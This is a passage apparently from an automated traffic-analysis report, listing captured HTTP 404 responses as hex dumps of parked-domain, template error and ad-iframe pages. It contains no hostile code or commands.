0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:07:46 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:08:29 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:08:32 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:08:34 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:08:37 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:09:33 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:09:36 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 